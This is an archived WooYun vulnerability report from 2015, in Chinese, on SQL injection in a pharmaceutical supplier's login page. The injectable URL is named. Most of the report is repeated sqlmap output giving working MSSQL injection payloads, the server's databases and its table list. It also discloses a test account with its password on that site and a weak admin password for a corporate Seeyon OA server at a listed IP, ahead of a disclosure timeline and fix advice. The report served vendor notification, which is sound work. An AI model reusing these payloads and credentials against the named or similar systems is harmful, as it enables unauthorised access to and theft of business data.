乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-15: 细节已通知厂商并且等待厂商处理中 2015-08-17: 厂商已经确认,细节仅向厂商公开 2015-08-27: 细节向核心白帽子及相关领域专家公开 2015-09-06: 细节向普通白帽子公开 2015-09-16: 细节向实习白帽子公开 2015-10-01: 细节向公众公开
-
http://www.crsdyy.com/ptsj/login.asp山东供应商
sqlmap identified the following injection points with a total of 68 HTTP(s) requests:---Place: POSTParameter: uname Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: uname=111' AND 8253=CONVERT(INT,(CHAR(58)+CHAR(121)+CHAR(111)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (8253=8253) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(108)+CHAR(104)+CHAR(58))) AND 'ysli'='ysli&action=1&password=1111&submit=%B5%C7%26%23160%3B%26%23160%3B%C2%BC Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: uname=111' UNION ALL SELECT CHAR(58)+CHAR(121)+CHAR(111)+CHAR(100)+CHAR(58)+CHAR(102)+CHAR(103)+CHAR(84)+CHAR(80)+CHAR(66)+CHAR(114)+CHAR(104)+CHAR(90)+CHAR(105)+CHAR(73)+CHAR(58)+CHAR(111)+CHAR(108)+CHAR(104)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL-- &action=1&password=1111&submit=%B5%C7%26%23160%3B%26%23160%3B%C2%BC Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: uname=111'; WAITFOR DELAY '0:0:5';--&action=1&password=1111&submit=%B5%C7%26%23160%3B%26%23160%3B%C2%BC Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: uname=111' WAITFOR DELAY '0:0:5'--&action=1&password=1111&submit=%B5%C7%26%23160%3B%26%23160%3B%C2%BC---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: uname Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: uname=111' AND 8253=CONVERT(INT,(CHAR(58)+CHAR(121)+CHAR(111)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (8253=8253) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(108)+CHAR(104)+CHAR(58))) AND 'ysli'='ysli&action=1&password=1111&submit=%B5%C7%26%23160%3B%26%23160%3B%C2%BC Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: uname=111' UNION ALL SELECT CHAR(58)+CHAR(121)+CHAR(111)+CHAR(100)+CHAR(58)+CHAR(102)+CHAR(103)+CHAR(84)+CHAR(80)+CHAR(66)+CHAR(114)+CHAR(104)+CHAR(90)+CHAR(105)+CHAR(73)+CHAR(58)+CHAR(111)+CHAR(108)+CHAR(104)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL-- &action=1&password=1111&submit=%B5%C7%26%23160%3B%26%23160%3B%C2%BC Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: uname=111'; WAITFOR DELAY '0:0:5';--&action=1&password=1111&submit=%B5%C7%26%23160%3B%26%23160%3B%C2%BC Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: uname=111' WAITFOR DELAY '0:0:5'--&action=1&password=1111&submit=%B5%C7%26%23160%3B%26%23160%3B%C2%BC---available databases [9]:[*] master[*] model[*] msdb[*] sdgs[*] shxt[*] sjcj[*] sjzl[*] syxh[*] tempdbsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: uname Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: uname=111' AND 8253=CONVERT(INT,(CHAR(58)+CHAR(121)+CHAR(111)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (8253=8253) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(108)+CHAR(104)+CHAR(58))) AND 'ysli'='ysli&action=1&password=1111&submit=%B5%C7%26%23160%3B%26%23160%3B%C2%BC Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: uname=111' UNION ALL SELECT CHAR(58)+CHAR(121)+CHAR(111)+CHAR(100)+CHAR(58)+CHAR(102)+CHAR(103)+CHAR(84)+CHAR(80)+CHAR(66)+CHAR(114)+CHAR(104)+CHAR(90)+CHAR(105)+CHAR(73)+CHAR(58)+CHAR(111)+CHAR(108)+CHAR(104)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL-- &action=1&password=1111&submit=%B5%C7%26%23160%3B%26%23160%3B%C2%BC Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: uname=111'; WAITFOR DELAY '0:0:5';--&action=1&password=1111&submit=%B5%C7%26%23160%3B%26%23160%3B%C2%BC Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: uname=111' WAITFOR DELAY '0:0:5'--&action=1&password=1111&submit=%B5%C7%26%23160%3B%26%23160%3B%C2%BC---current database: 'sdgs'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: uname Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: uname=111' AND 8253=CONVERT(INT,(CHAR(58)+CHAR(121)+CHAR(111)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (8253=8253) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(108)+CHAR(104)+CHAR(58))) AND 'ysli'='ysli&action=1&password=1111&submit=%B5%C7%26%23160%3B%26%23160%3B%C2%BC Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: uname=111' UNION ALL SELECT CHAR(58)+CHAR(121)+CHAR(111)+CHAR(100)+CHAR(58)+CHAR(102)+CHAR(103)+CHAR(84)+CHAR(80)+CHAR(66)+CHAR(114)+CHAR(104)+CHAR(90)+CHAR(105)+CHAR(73)+CHAR(58)+CHAR(111)+CHAR(108)+CHAR(104)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL-- &action=1&password=1111&submit=%B5%C7%26%23160%3B%26%23160%3B%C2%BC Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: uname=111'; WAITFOR DELAY '0:0:5';--&action=1&password=1111&submit=%B5%C7%26%23160%3B%26%23160%3B%C2%BC Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: uname=111' WAITFOR DELAY '0:0:5'--&action=1&password=1111&submit=%B5%C7%26%23160%3B%26%23160%3B%C2%BC---Database: sdgs[25 tables]+--------------------+| dbo.biuser_bak || dbo.bulist || dbo.download || dbo.download_type || dbo.fwl || dbo.gysuser || dbo.ip || dbo.link || dbo.lxjl || dbo.medicine_type || dbo.news || dbo.news_type || dbo.product || dbo.pt_user || dbo.qyfc || dbo.qyxchz || dbo.qyxcmx || dbo.sqlmapoutput || dbo.sysuser || dbo.v_search || dbo.zhaoshang || dbo.zhaoshang_oid || dbo.zhaoshang_type || dbo.zlzx || dbo.zlzx_type |+--------------------+
测试账号 013001/888888进价和供应途径都泄露了 价格对药品应该很重要把
http://114.251.20.5:8080/seeyon/index.jsp 集团弱口令一枚123456/123456
修复注入和弱口令
危害等级:高
漏洞Rank:15
确认时间:2015-08-17 10:25
感谢提交
暂无